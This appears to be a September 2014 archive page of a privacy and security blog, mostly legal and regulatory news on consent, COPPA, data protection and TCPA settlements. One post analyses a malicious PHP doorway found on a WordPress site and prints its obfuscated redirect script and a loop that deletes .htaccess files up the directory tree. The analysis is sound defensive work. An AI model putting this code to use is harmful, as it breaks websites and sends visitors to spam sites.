Monthly Archives: September 2014

Appeals Court Holds User Consent Required to Enforce Website Terms of Use

A recent decision by the United States Court of Appeals for the Ninth Circuit reinforces the importance of obtaining affirmative user consent to website Terms of Use for website owners seeking to enforce those terms against consumers. In Nguyen v. Barnes & Noble Inc., the Ninth Circuit held that Barnes & Noble’s website Terms of Use (“Terms”) were not enforceable against a consumer because the website failed to provide sufficient notice of the Terms, despite having placed conspicuous hyperlinks to the Terms throughout the website.

In Nguyen, the plaintiff filed a class action suit against Barnes & Noble for deceptive business practices and false advertising after the retailer cancelled the plaintiff’s online purchase. Barnes & Noble sought to remove the action from federal court to arbitration, relying on a binding arbitration provision contained in the website’s Terms.

The Ninth Circuit refused to enforce the arbitration clause in the Terms, finding that the plaintiff neither affirmatively assented to the Terms, nor did he have constructive notice of such Terms. Unlike “clickwrap” agreements that require users to affirmatively manifest assent (e.g., by clicking on an “I agree” button), the Barnes & Noble Terms were presented in “browsewrap” form – no affirmative manifestation of assent was required for the plaintiff to complete the online transaction. The court also determined that placing hyperlinks to the Terms at the bottom of each page of the website, without providing further notice or prompting the user to take some additional action to show intent, did not provide sufficient notice of the Terms to make them enforceable against the plaintiff.

Read the full Client Alert on the Ninth Circuit’s decision.

Article 29 Working Party States Principles in EU Data Protection Law Apply to Big Data

On September 16, 2014, the Article 29 Working Party (the “Working Party”) adopted a Statement on the impact of the development of big data on the protection of individuals with regard to the processing of their personal data in the EU (“Statement”). This two-page Statement sets forth a number of “key messages” by the Working Party on how big data impacts compliance requirements with EU privacy law, with the principal message being that big data does not impact or change basic EU data protection requirements.

Noting that the real value of big data remains to be proven, the Working Party rejected the idea that the principles of purpose limitation and data minimization, or the requirements that data must be adequate, relevant and not excessive in relation to its purpose, might have to be reconsidered at this time in light of big data.

It also expressed opposition to calls for a “use model” or a model primarily focused on risk of harm.

Instead, while acknowledging the need for innovative thinking on how key data protection principles apply in the context of big data, the Working Party found “no reason to believe that the EU data protection principles are no longer valid and appropriate for the development of big data.” However, it left open the possibility of “further improvements to make [the principles] more effective in practice” in the context of big data.

Other “key messages” include:

  • The Working Party supports making big data benefits available to individuals and society.
  • Big data raises important social, legal and ethical questions, including privacy and data protection rights.
  • Privacy expectations of users must be met in the context of big data.
  • Upholding the purpose limitation is essential to preclude companies that have built monopolies and dominant positions from inhibiting market entry by others.
  • The Working Party has already provided guidance on numerous big data-related issues such as purpose limitation, anonymization, legitimate interest, and necessity and proportionality in law enforcement.
  • The Working Party will work with international regulators to ensure that EU data protection rules are appropriately applied to big data.
  • The Working Party understands the compliance challenges caused by the varying requirements in different jurisdictions.
  • International cooperation is needed to provide consistent guidance on operational and compliance questions as well as on joint enforcement of applicable rules.
  • EU data protection rights that are based on a fundamental right are subject only to limited exceptions under the law.

10 Things to Consider Before You Unblock a Website

Just recently, I was asked by a customer to provide some advice for their network administrators on unblocking sites. Sometimes you have to say no, but how do you decide which to give the green light to? Here are some points to bear in mind...

  1. Have you looked at the whole site? There may be different content on some of the links.
  2. Is the domain a generic one? Maybe many sites are served from this domain. Can we limit the unblock into just one specific URL?
  3. Will the content change in future? If it is dynamic, what kind of content might be found there next week?
  4. Is there a better website people could visit for this same purpose? For example, there is no reason to unblock an image search engine other than Google Image Search, as it may not have all the safety features enforced by Smoothwall.
  5. What’s the reason the site was blocked? If it is a misclassification it should be reported to Smoothwall, and  it will get fixed for everyone.
  6. Do you want to unblock just this website, or all websites of this type?  Often it is better to adjust the categorisation (such as allowing all “sports” websites) rather than dealing with one at a time.
  7. Does it allow access to other pages surreptitiously, or draw content from other sites? Translation sites can cause this problem.
  8. You might be able to understand the risks of this site; but do your users? Children, for example, may not be easily able to understand risks of bullying or grooming on a social network, and less technical users might inadvertently leak sensitive information on file sharing sites.
  9. Are there any regulations or risk assessments you need to consider before unblocking this site?
  10. Does the site rely on 3rd party resources?  You can use the advanced Policy Test Tool to examine these. Are these locations also safe with regard to points 1-9?


Article 29 Working Party Issues an Opinion on Internet of Things

On September 22, 2014, the Article 29 Working Party (the “Working Party”) released an Opinion on the Internet of Things (the “Opinion”) that was adopted during the last plenary session of the Working Party in September 2014. With this Opinion, the Working Party intends to draw attention to the privacy and data protection challenges raised by the Internet of Things and to propose recommendations for the stakeholders to comply with the current EU data protection legal framework.

In its Opinion, the Working Party specifically addresses (1) “wearable computing” such as glasses and clothes that contain computers or sensors, (2) “quantified self” such as fitness devices carried by individuals who want to record information about their own habits and lifestyles and (3) “domotics” which are devices in the home that can be connected to the Internet such as smart appliances.  These are three important recent developments related to the Internet of Things and considered by the Working Party to exemplify the current Internet of Things.

According to the Working Party, the main privacy, data protection and security issues that are currently raised by the Internet of Things are (1) the user’s lack of control over his or her data and information asymmetry; (2) the quality of the user’s consent; 3) the repurposing of original data processing; (4) intrusive profiling and behavioral analysis; (5) difficulties to ensure anonymity and (6) security risks.

The Opinion highlights the fact that the EU Data Protection Directive 95/46/EC on the protection of personal data and the e-Privacy Directive 2002/58/EC as amended in 2009 are fully applicable to the processing of personal data through different types of devices, applications and services used in the context of the Internet of Things.

The Opinion provides a comprehensive set of practical recommendations addressed to various stakeholders involved in the development of the Internet of Things (i.e., device manufacturers, application developers, social platforms, further data recipients, data platforms and standardization bodies) in order for them to develop a sustainable Internet of Things. The  recommendations are intended to assist with compliance with most of the obligations provided by the EU data protection legal framework (e.g., consent requirements, legal bases for processing personal data, data quality and data security, specific requirements for processing sensitive data, transparency requirements, the rights of the data subjects).

The Working Party will continue to monitor the developments of the Internet of Things and cooperate with other national and international regulators and lawmakers on these issues.

Software Security – Hackable Even When It’s Secure

On a recent call, one of the smartest technical folks I can name said something that made me reach for a notepad, to take the idea down for further development later. He was talking about why some of the systems enterprises believe are secure really aren't, even if they've managed to avoid some of the key issues.

Let me explain this a little deeper, because this thought merits such a discussion.

Think about what you go through if you're testing a web application. I can speak to this type of activity since it was something I focused on for a significant portion of my professional career. Essentially the whole of the problem breaks down to being able to define what the word secure means. Many organizations that I've first-hand witnessed stand up a software security program over the years follow the standard OWASP Top 10. It's relatively easy to understand, it's fairly well maintained, and it's relatively easy to test software against. It's hard to argue with the notion that the OWASP Top 10 is not the standard for determining whether a piece of software is secure or not.

Herein lies the problem. As many of you who do software security testing can testify to, without at least a structured framework (aka checklist) to go against, the testing process becomes never-ending. I don't know about you, but I've never had the luxury of taking all the time I needed, everything always needed to go live yesterday and I or my team was always the speed bump on the way to production readiness. So we first settled on making sure none of the OWASP Top 10 were present in software/applications we tested. Since this created an unreal amount of bugs, we narrowed scope down to just the OWASP Top 2. If we could eliminate injection and cross-site scripting the applications would be significantly more secure, and everything would be better.

Another issue, then. After all that testing, and box-checking, when we were fairly sure the application didn't have remote file includes, cross-site scripting (XSS), SQL Injection or any of that other critical stuff - we allowed the app to go live and it quickly got hacked. The issue this caused for us was not only one of credibility, but also of confusion. How could the app not have any of those critical vulnerabilities but still get easily hacked?!

Now back to the issue at hand.

The fact is that even when you've managed to avoid all the common programming mistakes, and well-known vulnerabilities you can still produce a vulnerable application. Look at what EBay is going through right now. Fact is, even though there may not be any XSS or SQLi in their code - they still have issues allowing people to take over accounts. Why? It's because there is more to securing an application than making sure there aren't any coding mistakes. Fully removing the OWASP Top 10 (good luck with that!) from all your code bases may make your applications more safe than they are now - but it won't make them secure. And therein lies the problem.

When you hand your application over to someone who is going to test it for code issues like the OWASP Top 10, and only that, you're going to miss massive bugs that may still lurk in your code. Heartbleed anyone? Maybe there is a logic flaw in your code. Maybe there is a procedural mistake that allows for someone to bypass a critical security mechanism. Maybe you've forgotten to remove your QA testing user from your production code. Thing is, you may not actually know if you just test it for app security issues with traditional or even emerging tools. Static analysis? Nope. Dynamic analysis? Nope. Manual code review? Maybe.

The ugly truth is that unless you have someone who not only understands what the code should do under normal conditions - but also what it should never do, you will continue to have applications with security issues. This is why automated scanners fail. This is why static analysis tools fail. This is why penetration testers can still fail - unless they're thinking outside the code and thinking in terms of application functionality and performance.

The reality is that for those applications that simply can't easily fail - you not only need to get it tested by some brilliant security and development minds, but also by someone who understands that beautiful combination of software development, security, and application business processes and design. Someone who looks at your application and says: "You know what would be interesting?"...

In my mind this goes a great deal to explaining why there are so many failing software security programs out there in the enterprise. We seem to be checking all the right boxes, testing for all the right things, and still coming up short. Maybe it's because the structural integrity hasn't been validated by the demolitions expert.

Test your applications and software. Go beyond what everyone tells you to check and look deep into the business processes to understand how entire mechanisms can be abused or entirely bypassed. That's how we're going to get a step closer to having better, more safe and secure code.

FTC Settles COPPA Violation Charges Against Yelp and TinyCo

On September 17, 2014, the Federal Trade Commission announced that the online review site Yelp, Inc., and mobile app developer TinyCo, Inc., have agreed to settle separate charges that they collected personal information from children without parental consent, in violation of the Children’s Online Privacy Protection Rule (the “COPPA Rule”).

Yelp

According to the FTC’s complaint against Yelp, from 2009 to 2013, Yelp app users had to provide information such as their name, email address, ZIP code and possibly date of birth and gender in connection with the app registration process. The FTC alleged that Yelp failed to implement a functional age-screening mechanism as part of the app registration process, thus allowing several thousand children who provided a date of birth indicating that they were under the age of 13 to register and gain full access to the Yelp online review service through the Yelp app and website. In addition, Yelp automatically collected information from Yelp app users’ phones, including unique identifiers associated with their mobile devices. The FTC alleged that because Yelp collected information from users whose self-declared birth date indicated that they were under the age 13, Yelp was deemed to have “actual knowledge” under the COPPA Rule that it was collecting information from children. Yelp’s alleged conduct thus violated the COPPA Rule requirements that website operators notify parents and obtain their consent before collecting, using or disclosing personal information from children under 13 years of age.

Pursuant to the proposed settlement with the FTC, Yelp is required to pay a civil penalty of $450,000 and must delete information obtained from users who stated they were 13 years of age or younger at the time they registered for the Yelp App, unless Yelp can prove that the users actually were older than 13. Yelp also is required to comply with the COPPA Rule requirements in the future and must submit a detailed compliance report one year from the date when the court order is entered.

TinyCo

According to the FTC’s complaint, TinyCo offers free mobile apps for download and play, including “Tiny Pets,” “Tiny Zoo,” “Tiny Village,” “Tiny Monsters,” and “Mermaid Resort.” The FTC assessed various features (such as the themes appealing to children, animated characters and simple language) and determined that the apps were directed at children under 13. The FTC claimed that many of the apps included an optional feature that collected users’ email addresses. The FTC also claimed that TinyCo had received complaints from parents related to the apps and information collected from their children, but failed to take steps to verify whether TinyCo had collected information from the children. As in the Yelp action, the FTC alleged that TinyCo violated the COPPA Rule by failing to notify parents and obtain their consent before the company collected, used or disclosed personal information from children under 13 years of age.

Pursuant to the terms of the proposed settlement, TinyCo is required to pay a civil penalty of $300,000 and must delete information obtained from children under 13. TinyCo also is required to comply with the COPPA Rule requirements in the future and to submit a detailed compliance report one year from the date when the court order is entered.

A post on the FTC’s Business Center blog describing the settlement with Yelp identifies the following key takeaways:

  • companies should not disregard COPPA compliance just because they believe their business is not child-related;
  • companies need to appraise their apps in light of the privacy or security promises they make; and
  • companies need to pay attention to the information prospective customers are providing because “[a]n age-screening feature that doesn’t really screen for age can hardly be considered effective.”

Article 29 Working Party to Establish a Common Approach on the Right to be Forgotten for All EU Data Protection Authorities

On September 18, 2014, the Article 29 Working Party (the “Working Party”) announced its decision to establish a common approach to the right to be forgotten (the “tool-box”). This tool-box will be used by all EU data protection authorities (“DPAs”) to help address complaints from search engine users whose requests to delete their search result links containing their personal data were refused by the search engines. The development of the tool-box follows the Working Party’s June 2014 meeting discussing the consequences of the European Court of Justice’s judgment in Costeja of May 13, 2014.

The Working Party reports that the DPAs have received numerous complaints from search engine users concerning the right to be forgotten, which demonstrates the need for such a tool-box.

As part of this “tool-box,” the Working Party intends to put in place a network of dedicated contact persons within the DPAs in order to develop common case-handling criteria for the complaints relating to the right to be forgotten. This network shall provide the DPAs with (1) a common record of decisions regarding the right to be forgotten, and (2) a dashboard to be used to identify the different types of complaints and highlight similarities.

The Working Party also announced that it will continue to analyze how search engines comply with the Judgment.

On the same day, the European Commission published a factsheet on the Working Party’s website concerning the “myths” related to the right to be forgotten.

French Data Protection Authority Reviews 100 Websites During EU Cookies Sweep Day

On September 18, 2014, the French Data Protection Authority (the “CNIL”) announced plans to review 100 French websites on September 18-19, 2014. This review is being carried out in the context of the European “cookies sweep day” initiative, an EU online compliance audit. The Article 29 Working Party organized this joint action, which runs from September 15-19, 2014, to verify whether major EU websites are complying with EU cookie law requirements.

The eight EU data protection authorities (“DPAs”) that are taking part in this initiative are spending one or two days checking the most popular EU e-commerce and media websites.

In particular, the CNIL will examine:

  • The number and type of the cookies placed on the user’s computer;
  • The methods by which users are informed of cookies;
  • The visibility and the quality of the information provided to users;
  • How the site obtains user consent;
  • What happens if a user refuses the cookie; and
  • How long the website’s cookies remain on users’ computers.

The CNIL and other participating DPAs will use a common analysis grid when reviewing the sites.

The EU cookies sweep day is intended to provide the EU DPAs with an overview of existing cookie-related practices. Although the CNIL will not impose sanctions based on this review, it may impose sanctions following its planned inspections, which will begin in October 2014 and will verify compliance with the CNIL’s new guidance on the use of cookies.

UK ICO Launches Consultation on Criteria for Privacy Seal Schemes

On September 2, 2014, the UK Information Commissioner’s Office (“ICO”) published a consultation on the framework criteria for selecting scheme providers for its privacy seal scheme. The consultation gives organizations the opportunity to provide recommendations for the framework criteria that will be used to assess the relevant schemes. The consultation is open until October 3, 2014.

Under the draft framework criteria, the ICO’s proposals include the following:

  • ICO endorses at least one scheme for a minimum of 3 years;
  • The ICO has the authority to revoke an endorsement of a scheme;
  • The scheme operator takes responsibility for the day-to-day operation of the scheme and retains ownership of the scheme (including the liabilities and indemnities that may be associated with the operation of the scheme); and
  • The scheme operator is the contact point for queries and complaints related the scheme. Nevertheless, individuals may send complaints directly to the ICO if their concern relates to a breach of the Data Protection Act or the Privacy and Electronic Communications Regulations.

A scheme must first obtain accreditation from the UK Accreditation Services (“UKAS”), the national accreditation body for the UK, before it may gain the ICO’s endorsement. The ICO will participate in the UKAS accreditation process by offering technical expertise and advice to UKAS.

As detailed in its consultation document, the ICO is interested in receiving feedback on the roles and responsibilities of the ICO; the underlying principles; the scope, objectives and sustainability of the scheme; the certification process; and the quality criteria for organizations (i.e., relating to proficiency and knowledge).

The ICO hopes to select a proposal by early 2015 and aims to launch the first round of endorsed schemes in 2016.

Hunton Global Privacy Update – September 2014

On September 16, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program covered a number of privacy and data protection topics, including updates in the EU and Germany, highlights on the UK Information Commissioner’s Office annual report and an APEC update.

Listen to a recording of the September 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for November 18, 2014.

Most Contradictive Doorway Generator

Check this thread on WordPress.org forum. The topic starter found a suspicious PHP file and asked what it was doing.

The code analysis shows that it’s some sort of a spammy doorway. But it’s a very strange doorway and the way that it works doesn’t make sense to me.

First of all, this script has a random text and code generator. The output it generates is [kind of] always unique. Here is a couple of output pages:

http://pastebin.com/ymwMZMWP
http://pastebin.com/Y6B7WM2T

...
<title>Is. Last spots brows: Dwelling. Immediately moral.</title>
</head>
<body>listend40721
<span>Flowerill merry chimes - has: Her - again spirits they, wooers. Delight preserve. For he. Free - snow set - grave lapped, icecold made myself visitings allow, beeves twas. Now one:
...

We usually see such a random text, when spammers want search engines to index “unique” content with “right” keywords. But…

1. the script returns the page with the 404 not found code.

header("HTTP/1.1 404 Not Found");

so the page won’t be indexed by search engines.

2. The obfuscated JavaScript code at the bottom of the generated page redirects to a pharma site after about a second.

function falselye() { falselya=29; falselyb=[148,134,139,129,140,148,75,145,140,141,75,137,140,128,126,145,134,140,139,75,133,143,130,131,90,68,133,145,145,141,87,76,76,145,126,127,137,130,145,138,130,129,134,128,126,143,130,144,75,130,146,68,88];
falselyc=""; for(falselyd=0;falselyd<falselyb.length;falselyd++) { falselyc+=String.fromCharCode(falselyb[falselyd]-falselya); } return falselyc; } setTim eout(falselye(),1263);

decoded

window.top.location.href='hxxp://tabletmedicares .eu';

Update: on another site the script redirected to hxxp://uanlwkis .com (also pharma site), which was registered only a few days ago on Sept 6th, 2014.

But the generated text has no pharma keywords. One more hint that it’s not for search engines. Maybe it’s an intermediary landing page of some email spam campaign that just needs to redirect visitors? I saw many such landing pages on hacked sites. But it most cases they looked like the decoded version of the script — just a redirection code. Indeed why bother with sophisticated random page generator if no one (neither humans nor robots) is going to read it?

3. There is also this strange piece of code:

$s='/';
if (strtolower(substr(PHP_OS,0,3))=='win') $s="\\\\";
$d=array(".$s");
$p="";
for($i=1; $i<255; $i++){
$p.="..$s";
if (is_dir($p)){
array_push($d,$p);
}
else{break;}
}
foreach($d as $p){
$a="h"."tac"."c"."es"."s";
$a1=$p.".$a";
$a2=$p.$a;
$a3=$p."$a.txt";
@chmod($a1,0666);@unlink($a1);
@chmod($a2,0666);@unlink($a2);
@chmod($a3,0666);@unlink($a3);
}

What it does it tries to find an delete(!) all file with names .htaccess, htaccess and htaccess.txt in the current directory and all(!) the directories above the current.

That just doesn’t make sense. Why is it trying to corrupt websites? I would understand if it only removed its own files and injected code in legitimate files, but it tries to just remove every .htaccess (and its typical backups) without checking what’s inside. That’s a really disruptive and annoying behavior given that many sites rely on the settings in .htaccess (e.g. most WordPress and Joomla sites).

It’s indeed a most contradictive doorway generator that I ever seen. I can’t find any good explanation why it does things the way it does. Maybe you have any ideas?

Related posts:

Vermont Attorney General Reaches Settlement with Aaron’s Franchisee Over Unlawful Debt Collection Practices

On September 8, Vermont Attorney General William Sorrell announced that SEI/Aaron’s, Inc. has entered into an assurance of discontinuance, which includes $51,000 in total fines, to settle charges over the company’s remote monitoring of its customers’ leased laptops. The settlement stems from charges accusing SEI/Aaron’s, an Atlanta-based franchise of the national rent-to-own retailer Aaron’s, Inc., of unlawfully using surveillance software on its leased laptops to assist the company in the collection of its customers’ overdue rental payments. The Vermont Office of the Attorney General claimed that such remote monitoring of the laptop users’ online activities in connection with debt collection constituted an unfair practice in violation of the Vermont Consumer Protection Act.

Under the settlement, the company agreed to pay a $45,000 civil penalty to the state of Vermont and $2,000 to each of the three Vermont consumers whose leased laptops were monitored by SEI/Aaron’s for allegedly unlawful purposes. The company also agreed to not install any monitoring software on its customers’ leased computers in connection with debt collection activities or in response to delinquent payments.

The Vermont Attorney General’s settlement with SEI/Aaron’s comes nearly a year after the company’s franchisor, Aaron’s Inc., reached a settlement with the FTC over charges that the franchisor knowingly played a vital role in its franchisees’ installation and use of surveillance software on rental computers to secretly monitor consumers.

Call for help: researching the recent gmail password leak

Hey folks,

You probably heard this week about 5 million @gmail.com accounts posted. I've been researching it independently, and was hoping for some community help (this is completely unrelated to the fact that I work at Google - I just like passwords).

I'm reasonably sure that the released list is an amalgamation of a bunch of other lists and breaches. But I don't know what ones - that's what I'm trying to find out!

Which brings me to how you can help: people who can recognize which site their password came from. I'm trying to build a list of which breaches were aggregated to create this list, in the hopes that I can find breaches that were previously unreported!

If you want to help:

      1. Check your email address on https://haveibeenpwned.com/
      2. If you're in the list, email ihazhacked@skullsecurity.org from the associated account
      3. I'll tell you the password that was associated with that account
      4. And, most importantly, you tell me which site you used that password on!

In a couple days/weeks (depending on how many responses I get), I'll release the list of providers!

Thanks! And, as a special 'thank you' to all of you, here are the aggregated passwords from the breach! And no, I'm not going to release (or keep) the email list. :)

Web Filtering Is Not Glamorous, but You May Still Make the Paper

What may be done at any time will be done at no time. 
  ~ Scottish Proverb

Procrastination seems to be built into human nature somehow; some problems become crises before being dealt with. In the beginning, most web content filtering problems are virtually unnoticeable. Maybe it’s because they always seem to start so small they’re nearly innocuous: A slip here, slide there. And who really wants to deal with web filtering and make it a priority?

Web content filtering isn’t glamorous. Other issues feel more pressing, like network failures on testing days. Some issues are just more pleasant to deal with, like procuring new hardware. And let’s face it, students won’t sing your praises for bulletproofing your web filter. It is, however, necessary. Unlike rescheduled test days or network performance issues, a web filter failure will get your name in the paper.

Take Glen Ellyn Elementary District 41 near Chicago, Illinois. After a web filter failure there, in which fourth and fifth grade students were caught viewing pornography on the playground, parents combined forces to bring to light “other instances of inappropriate computer usage at district schools.” All together, the story originally broke in early May, but once on radar with the press, progressive coverage of events becomes standard. The most recent update on Glen Ellyn was published in August.

Another example of this phenomenon happened in Forest Grove, Oregon. A student there was using her IPad to look at erotica through the literature curation website Wattpad. The story was a follow-up in response to an investigational piece by the local news which focused on student agility in filtering circumvention.

And it isn’t just emergencies that get a school noticed for its web filtering policies. Apparently even over blocking of sites is press worthy, as indicated by the Waseca County News, on grounds that it is unfair. Sometimes the discussion even gets political, as it did in Woodbury, Connecticut, where a student doing research noticed that there seemed to be uneven blocking of conservative branded sites.

There are also probably more instances of web filtering gone bad that go unreported, but there’s really no way to tell how a filtering fumble will shake out before it hits the press. Of course, that begs the question; with so much at stake, why take the risk? Like laundry, dishes, or getting your oil changed, making sure your web filter is up to the challenge is the first small step in making sure that your students are protected, but it’s an important one. Perhaps it’s time to schedule some time

Discovery of 13-Year Hacking Scheme Highlights Questions About Cyber Insurance Coverage

Hunton & Williams Insurance Litigation & Counseling partner Lon Berk reports:

An Israeli security firm recently uncovered a hacking operation that had been active for more than a decade. Over that period, hackers breached government servers, banks and corporations in Germany, Switzerland and Austria by using over 800 phony front companies (which all had the same IP address) to deliver unique malware to victims’ systems. The hackers purchased digital security certificates for each phony company to make the sites appear legitimate to visitors. Data reportedly stolen included studies on biological warfare and nuclear physics, plans for key infrastructure, and bank account and credit card data.

The attack highlights concerns, not only about cybersecurity, but also about the extent to which such breaches are covered by specialty cyber insurance policies. These policies typically are written on a claims-made basis; that is, a policy responds to a claim made during its policy period. However, the policies also restrict coverage to events occurring on or after a “retroactive date.” Given that these types of breaches sometimes result from events stretching over years, even decades, and a breach may not be discovered for years, the retroactive date may limit the available coverage. If coverage for a loss related to a data breach is blocked by a cyber policy’s retroactive date, it may be necessary to look to standard general liability policies for coverage.

Mobile Apps Fail to Provide Basic Privacy Information According to GPEN’s Mobile Apps Sweep Results

On September 10, 2014, the Global Privacy Enforcement Network (“GPEN”) published the results of an enforcement sweep carried out in May of this year to assess mobile app compliance with data protection laws. Twenty-six data protection authorities worldwide evaluated 1,211 mobile apps and found that a large majority of the apps are accessing personal data without providing adequate information to users.

The results indicate that:

  • 85% of the mobile apps surveyed failed to provide clear information on how the apps collect, process and disclose user data;
  • In 59% of the cases, it was difficult to find information about privacy prior to installing the app;
  • 31% of the mobile apps appeared to request excessive access to personal data (e.g., geolocation data); and
  • 43% of the privacy notices were not tailored to the size of mobile device screens (e.g., the text is too small to read).

In light of these results, the data protection authorities that participated in the sweep are likely to launch enforcement actions in their jurisdictions. For instance, the Belgian data protection authority announced that it would contact certain stakeholders and, where severe breaches are identified, send cease and desist letters or notify other relevant enforcement authorities.

New Irish Data Protection Commissioner Appointed

On September 10, 2014, Helen Dixon was announced as the new Data Protection Commissioner for Ireland. Dixon currently is registrar of the Companies Registration Office and has experience in both the private and public sectors, including senior management roles in the Department of Jobs. Dixon will take up her appointment over the coming weeks, succeeding Billy Hawkes in the role. Hawkes has served as Commissioner for two terms since 2005.

Article 29 Working Party Releases Statement on ECJ Ruling Invalidating the EU Data Retention Directive

The Article 29 Working Party (the “Working Party”) recently released its August 1, 2014 statement providing recommendations on the actions that EU Member States should take in light of the European Court of Justice’s April 8, 2014 ruling invalidating the EU Data Retention Directive (the “Ruling”).

In particular, the Working Party’s statement provides recommendations on:

  • Ensuring that the relevant retained data are differentiated and limited to what is strictly necessary for the purpose of fighting “serious crime” (i.e., no automatic bulk retention of all categories of data);
  • Restricting government access to what is strictly necessary in terms of categories of data and data subjects, and also implementing substantive and procedural conditions for such access; and,
  • Ensuring effective protection against unlawful access and abuse (e.g., by allowing an independent authority to assess compliance with EU data protection laws).

The Working Party’s statement also emphasizes that the Ruling does not directly affect the validity of existing national data retention measures. Accordingly, the Working Party urges the European Commission to provide guidance on how the Ruling should be interpreted at the European and Member State levels.

Managing Security in a Highly Decentralized Business Model

Information Security leadership has and will likely continue to be part politicking, part sales, part marketing, and part security. As anyone who has been a security leader or CISO in their job history can attest to, issuing edicts to the business is as easy as it is fruitless- Getting positive results in all but the most strictly regulated environments is nearly impossible. In high centralized organizations, at least, the CISO stands a chance since the organization likely has common goals, processes, and capital spending models. When you get to an organization that operates in a highly distributed and decentralized manner the task of keeping security pace grows to epic proportions.

As I was performing a recent ISO 27002 controls audit against one of these highly decentralized organizations the magnitude of their challenge really hit me. While the specific industry is relevant to this example I can simply say that they are in the business of making, testing and selling stuff. Parts of their business make thing. Parts of their business test things. And parts of their business sell both the things the other businesses do for various use-cases. Some of the business is heavily regulated. Some of the business isn't regulated at all. All of the enterprise is connected via a single network, with centralized IT services, applications and management. I could stop right here and you'd understand why this is nearly impossible to make universally applicable.


Bad Math

What makes this even more difficult on the security organization is that their core team is exactly .04% of the overall company staff. Their full staff complement, including recently hired new members, are less than 5% of the total IT staff count. The security device-to-staffer ration is horrible, their budget is insignificant, and for all intents and purposes the security function is relatively new when compared against the rest of the enterprise. I'm not a statistician, or particularly good at math, but even I know those numbers don't work out well.


Diversity Challenges

Security in the enterprise is largely about building and operationalizing repeatable patterns of process and methodology to achieve scale. This works well in even very large, but very centralized and uniform enterprises. The problem is when you get into enterprises that are extremely diverse in business practices, technologies, and goals and compliance initiatives repeatable patterns fail to scale well since you end up building a new unique set for every different piece of the organization.

In this situation the only chance enterprise security has is local representation from inside the business. Generally, though, you're not going to find many security experts in my experience from within these business that have "an IT guy/gal" or three. The situation just keeps getting worse.

Think about this- from an operating platforms perspective you may have some OS/2, lots of UNIX variants, Mac OS, Windows from WinNT 4.0 through Windows 8.1, and then some device specific platforms like VxWorks. If you're lucky all you have is Ethernet (Category 5/6) cabling and nothing else... Now add specialized programs, PLCs, Industrial Controls Systems (ICS), and it gets messy fast.

At this point it almost doesn't matter how many security resources you have, the only way you'll scale is automation.


The Catch-22

 Sometimes things become a chicken vs egg problem. In order to have better scale with fewer resources your security organization clearly needs more automation. The problem with more automation is it tends to create the need for more security resources to manage it (you don't actually believe the marketing or sales hype that these things manage themselves, do you?) to get effective scale. Either way - you don't have the people to do this.


Bad, Meet Worse

Where things go from bad to untenable is when the business alignment and co-operation isn't ideal. As in real life, not all business units will be friendly or even want to deal with "corporate". In that case you're not only facing the impossible challenge of addressing the business security issues, but now you're fighting against politics as well. Sometimes you just can not win.

If you factor in that generally security isn't the most loved part of the IT organization because of its history of being "the no people" you quickly realize that the deck is heavily stacked against you. There are certainly ample opportunities to trip on your own untied shoelaces and fall flat on your face. The key to not doing this lies in a multi-step process which includes assessment, prioritization, buy-in, and effective operationalization.


Steering the Titanic by Committee

As the CISO or security leader of a highly decentralized enterprise you're not going to get many wins that come easily. You're probably not going to do a very good job at preventing and preempting that next breach. Heck you may not even be able to detect or respond in a timely fashion. But the key to not failing as hard is to not go at it alone. Even if you have a centralized security team of 100+ you're still going to fall prey to these same challenges. You need support from the various edge-cases in your enterprise structure. You need help from your corporate counterparts, and your outliers.

Cooperatively working towards better security is hard. It may be an order of magnitude harder than anything else you can do from a central control model - but if that's the only operating model you have available to you then it's time to make lemonade. In the next few posts I'll try to apply some of the lessons learned and recommendations from a series of these types of engagements. Maybe some of them will help you make better lemonade. Or figure out when it's time to move to a new lemonade stand.

FCC Announces 7.4 Million Dollar Settlement with Verizon

On September 3, 2014, the Federal Communications Commission announced that Verizon has agreed to pay $7.4 million to settle an FCC Enforcement Bureau investigation into Verizon’s use of personal information for marketing. The investigation revealed that Verizon had used customers’ personal information for marketing purposes over a multiyear period before notifying the customers of their right to opt out of such marketing.

In addition to the monetary penalty, the FCC’s Consent Decree, which is valid for three years, requires Verizon to:

  • designate a Compliance Officer;
  • develop and distribute a Compliance Manual to all covered personnel responsible for helping Verizon comply with the Consent Decree;
  • implement a training program for covered personnel that includes instructions about reporting any problems related to Verizon’s opt-out notices;
  • develop a procedure to place an opt-out notice on each customer invoice (either electronic or hard copy) sent to every customer for whom Verizon relies on opt-out consent; and
  • submit periodic Compliance Reports to the FCC Enforcement Bureau.

In announcing the Consent Decree, Travis LeBlanc, Acting Chief of the FCC’s Enforcement Bureau, emphasized that “[i]t is plainly unacceptable for any phone company to use its customers’ personal information for thousands of marketing campaigns without even giving them the choice to opt out.”

The Verizon settlement comes on the heels of another notable FCC settlement with Sprint Corporation.

Bank of America Finalizes 32 Million Dollar Settlement in TCPA Class Action

On September 2, 2014, a federal district court in California granted final approval to a settlement ending a class action against Bank of America (“BofA”) and FIA Card Services stemming from allegations that the defendants “engaged in a systematic practice of calling or texting consumers’ cell phones through the use of automatic telephone dialing systems and/or an artificial or prerecorded voice without their prior express consent, in violation of the Telephone Consumer Protection Act (“TCPA”).” The court granted preliminary approval to the settlement in December 2013.

Leading up to the settlement, a key dispute between the parties was whether BofA had obtained the requisite “prior express consent” to make autodialed or prerecorded calls to the plaintiffs’ cell phones. In the settlement, BofA denied all of the plaintiffs’ allegations and maintained that it did not violate the TCPA through its autodialed or prerecorded calls and text messages.

The court order certified a class of approximately seven million individuals who received allegedly unauthorized calls or text messages to a cellular telephone regarding a BofA credit card account or residential mortgage loan from 2007 through 2013. Due to the size of the class and the damages available under the TCPA, the court noted that, had the plaintiffs been victorious at trial, the potential amount of the award against the defendants could have caused post-trial concerns. The TCPA provides for statutory damages of $500 or $1,500 per unauthorized call or text.

This settlement is the latest in a string of recent settlements related to alleged violations of the TCPA. In the past few weeks, two other major financial institutions have agreed to settle TCPA class actions for tens of millions of dollars, though those settlements are still pending approval. Other entities that have agreed to multimillion-dollar settlements to end similar class actions this year include Best Buy Co., Inc. ($4.5 million in June 2014); Bank of the West ($3.3 million in June 2014); the Los Angeles Clippers ($5 million in June 2014); and T-Mobile US, Inc. ($5 million in April 2014).

Read the court order granting approval of the final settlement.

